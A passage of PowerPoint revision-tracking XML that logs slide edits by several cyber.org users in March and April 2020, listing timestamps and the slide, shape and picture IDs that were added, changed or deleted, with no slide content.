          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373190787" sldId="607"/>
            <ac:picMk id="7" creationId="{61FB1C39-6CC8-4287-8285-71C6C4B8FB2F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{62738D13-D9F2-5153-B65C-0A056049897F}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{62738D13-D9F2-5153-B65C-0A056049897F}" dt="2020-04-03T16:12:54.352" v="44" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{62738D13-D9F2-5153-B65C-0A056049897F}" dt="2020-04-03T16:12:48.133" v="42" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="638423102" sldId="613"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{62738D13-D9F2-5153-B65C-0A056049897F}" dt="2020-04-03T16:12:48.133" v="42" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="638423102" sldId="613"/>
            <ac:spMk id="3" creationId="{2BB3F4AD-B9EA-4E0A-9C1C-E22B576AB0DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}"/>
    <pc:docChg chg="delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:11:18.614" v="971"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T17:58:04.387" v="277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B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T17:58:04.387" v="277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7:58:11.684" v="289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B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T17:58:11.684" v="289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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T17:54:10.151" v="113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0:22.529" v="376" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3694468642" sldId="590"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:00:22.529" v="376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3:30.469" v="704" actId="20577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B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:00:51.108" v="380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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:03:30.469" v="704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4:39.923" v="812" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:04:03.877" v="708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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:04:39.923" v="81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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:07:00.080" v="814"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="315206133" sldId="595"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:11:18.614" v="971"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4139910246" sldId="596"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:07:52.940" v="841" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="2" creationId="{3E0F3E90-FDE5-43CB-B57A-50251D286DED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:10:35.895" v="963" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="3" creationId="{841EC8F2-047F-462B-BD45-4A942779A077}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:11:18.614" v="971"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="4" creationId="{76F9D023-7903-4744-B5AA-A7C079A8A42C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:07:58.018" v="845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Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:07:23.909" v="815" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{B3FBBB3F-014C-F3D9-C029-D173977C1647}" dt="2020-03-16T18:07:23.909" v="815" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:spMk id="3" creationId="{9FC8B5DB-6E54-4C75-99F7-D5B878084643}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:04:25.090" v="201" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:00:12.887" v="36" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:00:12.887" v="36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1:10.668" v="49" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:01:10.668" v="49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1:29.950" v="61" actId="20577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4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:01:29.950" v="61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2:19.575" v="104" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574180667" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:02:19.575" v="104" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:spMk id="3" creationId="{4BDDE3EC-F076-499C-96A3-50D98C09FDD7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2:49.965" v="128" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1667904667" sldId="608"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:02:49.965" v="128" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="3" creationId="{E677FC43-A4B1-4E42-8E0C-A80703E5CB7D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3:31.168" v="140" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1376180270" sldId="609"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:03:31.168" v="140" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1376180270" sldId="609"/>
            <ac:spMk id="3" creationId="{5DEAD0E6-1918-43FF-9E28-CCD68F119787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4:19.434" v="199" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2269361501" sldId="610"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{4A9399B7-B626-9887-37C0-3DA2DF07BE84}" dt="2020-03-19T22:04:19.434" v="199" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269361501" sldId="610"/>
            <ac:spMk id="3" creationId="{C2821631-6A21-443D-A6D9-C93BD9C3C198}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:32:20.998" v="136" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:31:18.653" v="109" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2881646623" sldId="611"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:31:18.653" v="109" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:spMk id="3" creationId="{3F11D95D-18C7-4EF3-B91F-1AB77A007EA5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:30:36.075" v="76" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:picMk id="4" creationId="{47330BFA-C9D2-4F93-B105-D306789D83D7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:32:16.107" v="135" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="638423102" sldId="613"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:32:16.107" v="135" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="638423102" sldId="613"/>
            <ac:spMk id="3" creationId="{2BB3F4AD-B9EA-4E0A-9C1C-E22B576AB0DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:29:42.934" v="54" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4062376826" sldId="615"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommy Gober" userId="S::tommy.gober@cyber.org::df822f60-4ab3-425c-ad52-a4a61a9d00cb" providerId="AD" clId="Web-{DD81C4DD-1A40-80C3-028D-0A468FDBE6EB}" dt="2020-03-21T18:29:42.934" v="54" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:spMk id="3" creationId="{821BC5BD-E2E6-4121-AB8D-B83154140DD6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}"/>
    <pc:docChg chg="custSel addSld delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:45:27.837" v="2925" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:56:38.642" v="52" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:54:17.203" v="10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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:56:38.642" v="52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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:56:49.170" v="63" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:56:49.170" v="63" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="34493695" sldId="588"/>
            <ac:spMk id="2" creationId="{A64FEC5D-874C-4E49-A174-F0DBE89B4A78}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:43:24.368" v="2923" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="309114280" sldId="589"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:42:23.762" v="2691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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:43:24.368" v="2923" actId="27636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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:57:39.859" v="74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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:57:39.859" v="74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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:44:45.276" v="2924"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3392114702" sldId="592"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T13:58:03.033" v="85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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:01:59.236" v="308" actId="20577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seph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:44:45.276" v="2924"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="7" creationId="{6CBB69CA-79CC-4FCF-96CA-435D992B974F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:02:02.426" v="309" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="8" creationId="{278DBB45-C4DC-49D4-9EC1-87F33ED14FB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:04:29.452" v="628" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:picMk id="4" creationId="{8CA071F5-23E9-44BA-A6E3-461124C369C0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:01:16.634" v="275" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:picMk id="6" creationId="{DB74C842-5771-40A3-95F0-BC2635BE6D3B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:04:20.378" v="625" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:cxnSpMk id="10" creationId="{BB767213-656F-4F80-B825-98451A6C4976}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:12:16.233" v="1013" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:04:43.186" v="65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D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:09:10.547" v="945" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:spMk id="3" creationId="{21C25B94-29D5-48B2-A6F8-F9E7433E2123}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:12:16.233" v="1013" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:spMk id="5" creationId="{D295DC8C-578D-418B-B624-DC9CEDEE303C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:07:22.618" v="670" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:picMk id="4" creationId="{55A47DB0-5A22-4D59-815A-44EB0DFCEF8A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:38:45.475" v="2432" actId="692"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4139910246" sldId="596"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:36:51.740" v="2324" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="3" creationId="{841EC8F2-047F-462B-BD45-4A942779A077}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:38:32.928" v="2424" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="8" creationId="{FCDA784B-B6BC-452C-8F52-DD87837A3106}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:37:29.825" v="2330" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="4" creationId="{C7352A9B-E49C-4F84-978E-634970290413}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:33:49.161" v="2091" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="5" creationId="{21C62EC2-8CA2-4E21-839B-C6F9BB549778}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:37:44.737" v="2334" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="6" creationId="{5C986C3B-7AF2-4159-BD72-37797EEDCB35}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:38:45.475" v="2432" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="7" creationId="{746DBC59-A47E-4951-83CA-250CE6D69AA7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:29:11.227" v="1905" actId="14861"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
